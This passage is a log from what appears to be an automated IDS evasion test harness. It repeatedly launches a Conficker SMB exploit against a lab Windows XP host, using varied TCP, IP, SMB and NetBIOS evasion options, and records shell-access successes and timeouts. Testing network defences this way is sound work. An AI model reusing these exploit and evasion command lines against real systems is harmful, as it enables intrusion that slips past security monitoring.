  3455. Info: Using random seed Ln/5ZlyjG9A
  3456. The following evasions are applied from stage netbios_connect to smb_openpipe:
  3457. - TCP timestamps echo reply value is sent in the wrong endianness
  3458. The following evasions are applied from stage smb_opentree to end:
  3459. - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
  3460.  
  3461. Info: NetBIOS connection 10.62.90.113:33860 -> 10.35.1.207:445
  3462. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3463. Info: Sending MSRPC request with exploit
  3464. Info: Shell found, attack succeeded
  3465. Info: Shell closed
  3466. 0: Success.
  3467. .........
  3468. 6078 runs averaging 2.05 runs / second ; progress: 2958/43200....
  3469. 6082 runs averaging 2.05 runs / second ; progress: 2963/43200..........
  3470. 6092 runs averaging 2.05 runs / second ; progress: 2968/43200...
  3471. 6095 runs averaging 2.05 runs / second ; progress: 2973/43200........
  3472. 6103 runs averaging 2.05 runs / second ; progress: 2978/43200.........
  3473. 6112 runs averaging 2.05 runs / second ; progress: 2983/43200......
  3474. 6118 runs averaging 2.05 runs / second ; progress: 2988/43200...
  3475. 6121 runs averaging 2.04 runs / second ; progress: 2993/43200.....
  3476. 6126 runs averaging 2.04 runs / second ; progress: 2998/43200...............
  3477. 6141 runs averaging 2.04 runs / second ; progress: 3003/43200................
  3478. 6157 runs averaging 2.05 runs / second ; progress: 3008/43200........
  3479. 6165 runs averaging 2.05 runs / second ; progress: 3013/43200.
  3480. 6166 runs averaging 2.04 runs / second ; progress: 3018/43200.......2015-06-08 00:09:52 INFO
  3481. Success. (10.62.90.113):
  3482. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48430 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jheLxOYHTqY --evasion=[msrpc_req,end]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"75%","268435454","alpharandomized" --verifydelay=1000 --payload=shell
  3483. Info: Using random seed jheLxOYHTqa
  3484. The following evasions are applied from stage smb_opentree to end:
  3485. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
  3486. The following evasions are applied from stage msrpc_req to end:
  3487. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3488. The duplicate packet has identical payload except that alphabetic characters are randomized
  3489.  
  3490. Info: NetBIOS connection 10.62.90.113:48430 -> 10.35.1.207:445
  3491. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3492. Info: Sending MSRPC request with exploit
  3493. Info: Shell found, attack succeeded
  3494. Info: Command shell connection reset.
  3495. Info: CommandShell::SendCommand() - Failed to send string
  3496. Info: Shell closed
  3497. 0: Success.
  3498. ..
  3499. 6176 runs averaging 2.04 runs / second ; progress: 3023/43200................
  3500. 6192 runs averaging 2.04 runs / second ; progress: 3028/43200...2015-06-08 00:10:00 INFO
  3501. Success. (10.62.90.116):
  3502. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30613 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=zrd64b/IIsg --evasion=[start,msrpc_req]tcp_chaff,"50%","shorthdr|longhdr","random" --evasion=[smb_opentree,end]tcp_paws,"5","52714395","shuffle" --verifydelay=1000 --payload=shell
  3503. Info: Using random seed zrd64b/IIsj
  3504. The following evasions are applied from stage start to msrpc_req:
  3505. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  3506. * TCP header shorter than 20 bytes
  3507. * TCP header longer than packet total size
  3508. * Duplicate packet has random bytes as payload
  3509. The following evasions are applied from stage smb_opentree to end:
  3510. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52714395> and has shuffled original payload
  3511.  
  3512. Info: NetBIOS connection 10.62.90.116:30613 -> 10.35.1.207:445
  3513. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3514. Info: Sending MSRPC request with exploit
  3515. Info: Shell found, attack succeeded
  3516. Info: CommandShell::SendCommand() - Failed to send string
  3517. Info: Command shell connection reset.
  3518. Info: Shell closed
  3519. 0: Success.
  3520. ...
  3521. 6199 runs averaging 2.04 runs / second ; progress: 3033/43200.......
  3522. 6206 runs averaging 2.04 runs / second ; progress: 3038/43200....
  3523. 6210 runs averaging 2.04 runs / second ; progress: 3044/43200........
  3524. 6218 runs averaging 2.04 runs / second ; progress: 3049/43200
  3525. 6218 runs averaging 2.04 runs / second ; progress: 3054/43200...2015-06-08 00:10:28 INFO
  3526. Success. (10.62.90.116):
  3527. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64754 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=kJYCaqQqc2Y --evasion=[start,end]tcp_initialseq,"4294967295" --evasion=[smb_opentree,end]tcp_paws,"50%","5765228","alpharandomized" --verifydelay=1000 --payload=shell
  3528. Info: Using random seed kJYCaqQqc2a
  3529. - Initial TCP sequence number is set to 0xffffffff - 4294967295
  3530. The following evasions are applied from stage smb_opentree to end:
  3531. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5765228> and has original payload with alphabetic bytes randomized
  3532.  
  3533. Info: NetBIOS connection 10.62.90.116:64754 -> 10.35.1.207:445
  3534. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3535. Info: Sending MSRPC request with exploit
  3536. Info: Shell found, attack succeeded
  3537. Info: Shell closed
  3538. 0: Success.
  3539. ..
  3540. 6224 runs averaging 2.03 runs / second ; progress: 3059/43200.................
  3541. 6241 runs averaging 2.04 runs / second ; progress: 3064/43200..........
  3542. 6251 runs averaging 2.04 runs / second ; progress: 3069/43200
  3543. 6251 runs averaging 2.03 runs / second ; progress: 3074/43200
  3544. 6251 runs averaging 2.03 runs / second ; progress: 3079/43200.
  3545. 6252 runs averaging 2.03 runs / second ; progress: 3084/43200....
  3546. 6256 runs averaging 2.03 runs / second ; progress: 3089/43200Pid 12828 timed out - killed
  3547. 2015-06-08 00:11:00 INFO
  3548. Timed out (10.62.90.117):
  3549. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22545 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=m9GqZcPtAhc --evasion=[netbios_connect,smb_openpipe]tcp_urgent,"5","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  3550. Info: Using random seed m9GqZcPtAhe
  3551. The following evasions are applied from stage netbios_connect to smb_openpipe:
  3552. - Add a random alphaurgent data byte to every 5 TCP segment.
  3553. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3554. - Add a random urgent data byte to every 2 TCP segment.
  3555.  
  3556. Info: NetBIOS connection 10.62.90.117:22545 -> 10.35.1.207:445
  3557. Terminated
  3558. .
  3559. 6258 runs averaging 2.02 runs / second ; progress: 3094/43200Pid 13136 timed out - killed
  3560. 2015-06-08 00:11:05 INFO
  3561. Timed out (10.62.90.111):
  3562. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41641 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=37m4osrLY9M --evasion=[netbios_connect,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  3563. Info: Using random seed 37m4osrLY9P
  3564. The following evasions are applied from stage netbios_connect to end:
  3565. - TCP timestamps echo reply value is sent in the wrong endianness
  3566. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3567. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  3568.  
  3569. Info: NetBIOS connection 10.62.90.111:41641 -> 10.35.1.207:445
  3570. Terminated
  3571. ....
  3572. 6263 runs averaging 2.02 runs / second ; progress: 3099/43200........
  3573. 6271 runs averaging 2.02 runs / second ; progress: 3104/43200..........
  3574. 6281 runs averaging 2.02 runs / second ; progress: 3109/43200........2015-06-08 00:11:22 INFO
  3575. Success. (10.62.90.117):
  3576. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54476 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=BY1D6exxlwo --evasion=[start,msrpc_bind]tcp_paws,"13","10","shuffle" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","140207545","alphanumrandomized" --verifydelay=1000 --payload=shell
  3577. Info: Using random seed BY1D6exxlwo
  3578. The following evasions are applied from stage start to msrpc_bind:
  3579. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
  3580. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3581. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140207545> and has original payload with alphanumeric bytes randomized
  3582.  
  3583. Info: NetBIOS connection 10.62.90.117:54476 -> 10.35.1.207:445
  3584. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3585. Info: Sending MSRPC request with exploit
  3586. Info: Shell found, attack succeeded
  3587. Info: CommandShell::SendCommand() - Failed to send string
  3588. Info: Command shell connection reset.
  3589. Info: Shell closed
  3590. 0: Success.
  3591. ..
  3592. 6292 runs averaging 2.02 runs / second ; progress: 3114/43200.......
  3593. 6299 runs averaging 2.02 runs / second ; progress: 3119/43200.............
  3594. 6312 runs averaging 2.02 runs / second ; progress: 3124/43200......
  3595. 6318 runs averaging 2.02 runs / second ; progress: 3129/43200...........
  3596. 6329 runs averaging 2.02 runs / second ; progress: 3134/43200.2015-06-08 00:11:45 INFO
  3597. Success. (10.62.90.117):
  3598. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49441 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=z1IpDeH5f6U --evasion=[msrpc_bind,end]tcp_paws,"50%","122942823","random" --evasion=[msrpc_bind,end]tcp_urgent,"13","random" --verifydelay=1000 --payload=shell
  3599. Info: Using random seed z1IpDeH5f6X
  3600. The following evasions are applied from stage msrpc_bind to end:
  3601. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122942823> and has random bytes as payload
  3602. - Add a random urgent data byte to every 13 TCP segment.
  3603.  
  3604. Info: NetBIOS connection 10.62.90.117:49441 -> 10.35.1.207:445
  3605. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3606. Info: Sending MSRPC request with exploit
  3607. Info: Shell found, attack succeeded
  3608. Info: CommandShell::SendCommand() - Failed to send string
  3609. Info: Command shell connection reset.
  3610. Info: Shell closed
  3611. 0: Success.
  3612. ........
  3613. 6339 runs averaging 2.02 runs / second ; progress: 3139/43200........
  3614. 6347 runs averaging 2.02 runs / second ; progress: 3144/43200......
  3615. 6353 runs averaging 2.02 runs / second ; progress: 3149/43200..
  3616. 6355 runs averaging 2.01 runs / second ; progress: 3154/43200.
  3617. 6356 runs averaging 2.01 runs / second ; progress: 3159/43200........
  3618. 6364 runs averaging 2.01 runs / second ; progress: 3164/43200.......
  3619. 6371 runs averaging 2.01 runs / second ; progress: 3169/43200
  3620. 6371 runs averaging 2.01 runs / second ; progress: 3174/43200
  3621. 6371 runs averaging 2.00 runs / second ; progress: 3179/43200....
  3622. 6375 runs averaging 2.00 runs / second ; progress: 3184/43200.........
  3623. 6384 runs averaging 2.00 runs / second ; progress: 3189/43200....
  3624. 6388 runs averaging 2.00 runs / second ; progress: 3194/43200
  3625. 6388 runs averaging 2.00 runs / second ; progress: 3199/43200
  3626. 6388 runs averaging 1.99 runs / second ; progress: 3204/43200.....Pid 16099 timed out - killed
  3627. 2015-06-08 00:12:58 INFO
  3628. Timed out (10.62.90.110):
  3629. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37388 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=ZvuU2DLSbLs --evasion=[msrpc_req,end]ipv4_opt,"8","inc","shuffle" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"4","3","1","zero" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  3630. Info: Using random seed ZvuU2DLSbLt
  3631. The following evasions are applied from stage smb_openpipe to end:
  3632. - Add a random alphaurgent data byte to every 1 TCP segment.
  3633. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3634. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of zeroes.
  3635. The following evasions are applied from stage msrpc_req to end:
  3636. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3637. The duplicate packet has shuffled payload
  3638.  
  3639. Info: NetBIOS connection 10.62.90.110:37388 -> 10.35.1.207:445
  3640. Terminated
  3641. ...
  3642. 6397 runs averaging 1.99 runs / second ; progress: 3209/43200............
  3643. 6409 runs averaging 1.99 runs / second ; progress: 3214/43200.......
  3644. 6416 runs averaging 1.99 runs / second ; progress: 3219/43200....2015-06-08 00:13:13 INFO
  3645. Success. (10.62.90.118):
  3646. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34064 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ecbhHa4ykX8 --evasion=[msrpc_bind,end]ipv4_frag,"1416" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","238925499","random_alphanum" --verifydelay=1000 --payload=shell
  3647. Info: Using random seed ecbhHa4ykX9
  3648. The following evasions are applied from stage smb_connect to msrpc_req:
  3649. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238925499> and has random alphanumeric bytes as payload
  3650. The following evasions are applied from stage msrpc_bind to end:
  3651. - IPv4 fragments with at most 1416 bytes per fragment
  3652.  
  3653. Info: NetBIOS connection 10.62.90.118:34064 -> 10.35.1.207:445
  3654. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3655. Info: Sending MSRPC request with exploit
  3656. Info: Shell found, attack succeeded
  3657. Info: Shell closed
  3658. 0: Success.
  3659.  
  3660. 6421 runs averaging 1.99 runs / second ; progress: 3224/43200.....
  3661. 6426 runs averaging 1.99 runs / second ; progress: 3229/43200...........
  3662. 6437 runs averaging 1.99 runs / second ; progress: 3234/43200.....
  3663. 6442 runs averaging 1.99 runs / second ; progress: 3239/43200..
  3664. 6444 runs averaging 1.99 runs / second ; progress: 3244/43200.Pid 17583 timed out - killed
  3665. 2015-06-08 00:13:38 INFO
  3666. Timed out (10.62.90.115):
  3667. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35275 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=123aANpGaM8 --evasion=[msrpc_req,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  3668. Info: Using random seed 123aANpGaM/
  3669. The following evasions are applied from stage netbios_connect to msrpc_req:
  3670. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  3671. The following evasions are applied from stage msrpc_req to end:
  3672. - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  3673.  
  3674. Info: NetBIOS connection 10.62.90.115:35275 -> 10.35.1.207:445
  3675. Terminated
  3676. .
  3677. 6447 runs averaging 1.98 runs / second ; progress: 3249/43200.Pid 17709 timed out - killed
  3678. 2015-06-08 00:13:40 INFO
  3679. Timed out (10.62.90.112):
  3680. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17433 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=n87ySzclSe0 --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]smb_decoytrees,"2","2","997","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  3681. Info: Using random seed n87ySzclSe2
  3682. The following evasions are applied from stage smb_opentree to smb_openpipe:
  3683. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  3684. The following evasions are applied from stage smb_openpipe to end:
  3685. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  3686. The following evasions are applied from stage msrpc_req to end:
  3687. - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 997 random alphanumeric bytes.
  3688.  
  3689. Info: NetBIOS connection 10.62.90.112:17433 -> 10.35.1.207:445
  3690. Terminated
  3691. .....
  3692. 6454 runs averaging 1.98 runs / second ; progress: 3254/43200........
  3693. 6462 runs averaging 1.98 runs / second ; progress: 3259/43200.....
  3694. 6467 runs averaging 1.98 runs / second ; progress: 3264/43200........Pid 18131 timed out - killed
  3695. 2015-06-08 00:13:58 INFO
  3696. Timed out (10.62.90.119):
  3697. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39853 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=AwsTHx1TWIM --evasion=[smb_connect,end]smb_writeandxpad,"8","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"5","chksum|nullchksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  3698. Info: Using random seed AwsTHx1TWIM
  3699. The following evasions are applied from stage smb_connect to end:
  3700. - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  3701. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3702. - With every 5 TCP packet a TCP chaff packet is sent. The chaff packet has:
  3703. * Invalid TCP checksum.
  3704. * NULL TCP checksum.
  3705. * NULL TCP control flags.
  3706. * An out-of-window sequence number.
  3707. * TCP header shorter than 20 bytes
  3708. * TCP header longer than packet total size
  3709. * Duplicate packet has random alpha bytes as payload
  3710. - 25% probability to add a zero urgent data byte to a TCP segment.
  3711.  
  3712. Info: NetBIOS connection 10.62.90.119:39853 -> 10.35.1.207:445
  3713. Terminated
  3714. ....
  3715. 6480 runs averaging 1.98 runs / second ; progress: 3269/43200.....
  3716. 6485 runs averaging 1.98 runs / second ; progress: 3274/43200
  3717. 6485 runs averaging 1.98 runs / second ; progress: 3279/43200..
  3718. 6487 runs averaging 1.98 runs / second ; progress: 3284/43200...........
  3719. 6498 runs averaging 1.98 runs / second ; progress: 3289/43200..............
  3720. 6512 runs averaging 1.98 runs / second ; progress: 3294/43200...
  3721. 6515 runs averaging 1.97 runs / second ; progress: 3299/43200
  3722. 6515 runs averaging 1.97 runs / second ; progress: 3304/43200.....
  3723. 6520 runs averaging 1.97 runs / second ; progress: 3309/43200...2015-06-08 00:14:42 INFO
  3724. Success. (10.62.90.112):
  3725. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28413 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=roD2a76i9NE --evasion=[msrpc_bind,end]tcp_paws,"75%","268435453","zero" --evasion=[msrpc_bind,msrpc_req]tcp_seg,"4" --verifydelay=1000 --payload=shell
  3726. Info: Using random seed roD2a76i9NG
  3727. The following evasions are applied from stage msrpc_bind to end:
  3728. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload
  3729. The following evasions are applied from stage msrpc_bind to msrpc_req:
  3730. - TCP packets are segmented to contain at most 4 bytes of payload.
  3731.  
  3732. Info: NetBIOS connection 10.62.90.112:28413 -> 10.35.1.207:445
  3733. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3734. Info: Sending MSRPC request with exploit
  3735. Info: Shell found, attack succeeded
  3736. Info: Shell closed
  3737. 0: Success.
  3738. ...
  3739. 6527 runs averaging 1.97 runs / second ; progress: 3314/43200.2015-06-08 00:14:46 INFO
  3740. Success. (10.62.90.112):
  3741. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22205 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=yAqSbF7a2AM --evasion=[msrpc_req,end]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  3742. Info: Using random seed yAqSbF7a2AP
  3743. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  3744. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3745. - TCP timestamps echo reply value is sent in the wrong endianness
  3746. The following evasions are applied from stage msrpc_req to end:
  3747. - IPv4 fragments with at most 24 bytes per fragment
  3748.  
  3749. Info: NetBIOS connection 10.62.90.112:22205 -> 10.35.1.207:445
  3750. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3751. Info: Sending MSRPC request with exploit
  3752. Info: Shell found, attack succeeded
  3753. Info: Shell closed
  3754. 0: Success.
  3755. ...
  3756. 6532 runs averaging 1.97 runs / second ; progress: 3319/43200....
  3757. 6536 runs averaging 1.97 runs / second ; progress: 3324/43200.......
  3758. 6543 runs averaging 1.97 runs / second ; progress: 3329/43200..
  3759. 6545 runs averaging 1.96 runs / second ; progress: 3334/43200
  3760. 6545 runs averaging 1.96 runs / second ; progress: 3339/43200
  3761. 6545 runs averaging 1.96 runs / second ; progress: 3344/43200.
  3762. 6546 runs averaging 1.95 runs / second ; progress: 3349/43200
  3763. 6546 runs averaging 1.95 runs / second ; progress: 3354/43200Pid 19330 timed out - killed
  3764. 2015-06-08 00:15:29 INFO
  3765. Timed out (10.62.90.116):
  3766. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53161 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oMEwt4ZkuNY --evasion=[smb_connect,msrpc_bind]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"5","51454" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  3767. Info: Using random seed oMEwt4ZkuNa
  3768. The following evasions are applied from stage smb_connect to msrpc_bind:
  3769. - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  3770. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3771. - TCP packets are segmented to contain between 5 and 51454 bytes of payload.
  3772. - 50% probability to add a zero urgent data byte to a TCP segment.
  3773.  
  3774. Info: NetBIOS connection 10.62.90.116:53161 -> 10.35.1.207:445
  3775. Terminated
  3776.  
  3777. 6547 runs averaging 1.95 runs / second ; progress: 3359/43200.........
  3778. 6556 runs averaging 1.95 runs / second ; progress: 3364/43200..Pid 19484 timed out - killed
  3779. 2015-06-08 00:15:36 INFO
  3780. Timed out (10.62.90.113):
  3781. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=RiI6C+8sOvQ --evasion=[start,msrpc_bind]ipv4_frag,"352" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  3782. Info: Using random seed RiI6C+8sOvR
  3783. The following evasions are applied from stage start to msrpc_bind:
  3784. - IPv4 fragments with at most 352 bytes per fragment
  3785. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  3786. - 75% probability to add a zero urgent data byte to a TCP segment.
  3787.  
  3788. Info: NetBIOS connection 10.62.90.113:56602 -> 10.35.1.207:445
  3789. Terminated
  3790. ..Pid 19507 timed out - killed
  3791. 2015-06-08 00:15:37 INFO
  3792. Timed out (10.62.90.114):
  3793. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30669 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=uTRrvWQWLxA --evasion=[smb_opentree,msrpc_req]ipv4_frag,"312" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","2","random_alpha" --verifydelay=1000 --payload=shell
  3794. Info: Using random seed uTRrvWQWLxC
  3795. The following evasions are applied from stage smb_opentree to msrpc_req:
  3796. - IPv4 fragments with at most 312 bytes per fragment
  3797. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3798. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
  3799.  
  3800. Info: NetBIOS connection 10.62.90.114:30669 -> 10.35.1.207:445
  3801. Terminated
  3802. 2015-06-08 00:15:37 INFO
  3803. Success. (10.62.90.113):
  3804. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25027 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=vYkbu33Qkdw --evasion=[smb_connect,end]netbios_chaff,"1","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_paws,"2","8","random_alpha" --verifydelay=1000 --payload=shell
  3805. Info: Using random seed vYkbu33Qkdy
  3806. The following evasions are applied from stage smb_connect to end:
  3807. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  3808. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  3809.  
  3810. Info: NetBIOS connection 10.62.90.113:25027 -> 10.35.1.207:445
  3811. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3812. Info: Sending MSRPC request with exploit
  3813. Info: Shell found, attack succeeded
  3814. Info: Command shell connection reset.
  3815. Info: CommandShell::SendCommand() - Failed to send string
  3816. Info: Shell closed
  3817. 0: Success.
  3818. ..........
  3819. 6573 runs averaging 1.95 runs / second ; progress: 3370/43200........
  3820. 6581 runs averaging 1.95 runs / second ; progress: 3375/43200
  3821. 6581 runs averaging 1.95 runs / second ; progress: 3380/43200..
  3822. 6583 runs averaging 1.94 runs / second ; progress: 3385/43200.......
  3823. 6590 runs averaging 1.94 runs / second ; progress: 3390/43200.............
  3824. 6603 runs averaging 1.95 runs / second ; progress: 3395/43200.......2015-06-08 00:16:09 INFO
  3825. Success. (10.62.90.113):
  3826. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=PeJtMGJRh88 --evasion=[smb_openpipe,msrpc_req]ipv4_opt,"3","inc","shuffle" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"6","zero" --evasion=[netbios_connect,end]tcp_paws,"1","145135867","random" --verifydelay=1000 --payload=shell
  3827. Info: Using random seed PeJtMGJRh88
  3828. The following evasions are applied from stage netbios_connect to end:
  3829. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 145135867> and has random bytes as payload
  3830. The following evasions are applied from stage smb_connect to msrpc_bind:
  3831. - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  3832. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3833. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
